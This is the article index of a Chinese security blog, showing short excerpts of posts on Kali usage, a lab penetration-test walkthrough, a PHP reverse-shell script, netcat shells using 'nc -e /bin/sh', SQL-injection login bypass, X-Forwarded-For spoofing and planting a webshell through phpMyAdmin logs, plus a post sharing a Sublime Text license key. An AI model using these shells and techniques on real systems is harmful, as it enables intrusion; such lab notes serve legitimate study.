Kali Liunx下解压缩zip,tar,tar.gz,tar.bz2文件 NOTES

tar(注:tar是打包,不是压缩!) 解包:tar xvf FileName.tar 打包:tar cvf FileName.tar DirName .gz 解压1:gunzip FileName.gz 解压2:gzip -d FileName.gz 压缩:gzip FileName .tar.gz 解压:tar zxvf FileName.tar.g...
kali linux 解压 压缩 zip tar tar.gz tar.bz2
myluzh 发布于 
1333 0
article cover

Os-ByteSec靶机渗透测试笔记 SECURE

0x01 初步探测 靶机导入虚拟机后,先找到靶机IP,使用netdiscover命令扫描即可。扫到靶机ip192.168.56.101 nmap扫了下靶机开放的端口 0x02 访问网站 那就先从80端口开始下手,访问站点看看有什么内容,主页如下 随后就是dirb扫了下目录,没有什么能利用的东西,然后看了下主页源代码,看到源代码,里面有个提示 #GET#...
myluzh 发布于 
1685 0

PHP反弹shell PHP

需要传递ip跟port两个参数,ip为攻击机的ip,port为自定义端口 <?php set_time_limit(0); $ip=$_GET['ip'] $port=$_GET['port']; if ($ip == "" and $port == "") { echo "[ip] [port] not defined"; exit(...
php 反弹 shell
myluzh 发布于 
1461 0

Netcat基本用法总结 NOTES

0x01基础使用 靶机创建一个服务端: nc -nvlp [端口] 攻击机开启监听: nc [服务端IP] [端口] 0x02获取shell 正向shell 靶机创建一个服务端: #Windows nc -nvlp [端口] -e cmd.exe #Linux nc -nvlp [端口] -e /bin/sh 攻击机开启监听: nc [服务端IP] [端口]...
myluzh 发布于 
1591 0

Kali Liunx更新源-国内Kali源 NOTES

0x01编辑kali的更新源地址文件 sudo vim /etc/apt/sources.list 0x02添加下面的源地址(选择几个增加即可) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu...
kali linux 更新源
myluzh 发布于 
1487 0

Kali Liunx下利用openssl进行md5加密 NOTES

0x01 MD5加密 交互式输入 [root@kali ~]# openssl OpenSSL> md5 123456 (stdin)= f447b20a7fcbf53a5d5be013ea0b15af OpenSSL> md5 123456(stdin)= e10adc3949ba59abbe56e057f20f883e #M...
kali linux openssl md5 加密
myluzh 发布于 
1871 0
article cover

Sublime Text 3 安装 注册 汉化 NOTES

0x01安装 进入官网 下载Sublime Text 3 并且安装,官网下载太慢的话可以复制下载链接用迅雷下载。 0x02注册 运行Sublime,先点击状态栏的help,再点击进入enter lisence ,跳出来一个对话框,把下面的激活码复制进去即可注册。 ----- BEGIN LICENSE ----- Member J2TeaM Single ...
myluzh 发布于 
1416 0

简单分析登陆界面SQL注入 实现登录绕过 NOTES

0x01适用条件 1.这个登陆系统用如下SQL语句来进行登陆校验 select * from user where username = '$username' and password='$passowrd' 这种sql语句,一般后面的判断就是如果数据库中存在用户名为$username, 密码为$passowrd的用户,就登陆成功,否则就登陆失败。 2.系...
sql注入
myluzh 发布于 
2391 0
article cover

X-Forwarded-For,伪造HTTP请求端真实IP NOTES

关于HTTP X-Forwarded-For 介绍 需要伪造请求端为127.0.0.1,直接burpsuite抓包,然后增加字段X-forwarded-for: 127.0.0.1,提交即可 例如下面有一道CTF题,前面部分就是利用伪造xforwardedfor来实现访问的,如下,访问后提示没有访问对象的权限,对象受保护或服务器不可读。 第一时间就想到了,...
X-Forwarded-For
myluzh 发布于 
1582 0

phpMyAdmin利用日志文件get webshell PHP

条件:需要使用root登陆phpmyadmin 0x01开启日志 进入phpmyadmin后,选择变量 1.找到“general log”选择“ON”开启,也可以通过sql语句开启日志 set global general_log='on' 2.找到“general log file”选项把日志后缀名.log改为.php,把路径改到站点根目录www下面,也可...
渗透 phpMyAdmin 日志 getwebshell
myluzh 发布于 
1154 0
blogger
myluzh
云猿生工程师

搜索文章

热门文章

最新评论

推荐链接

站点存档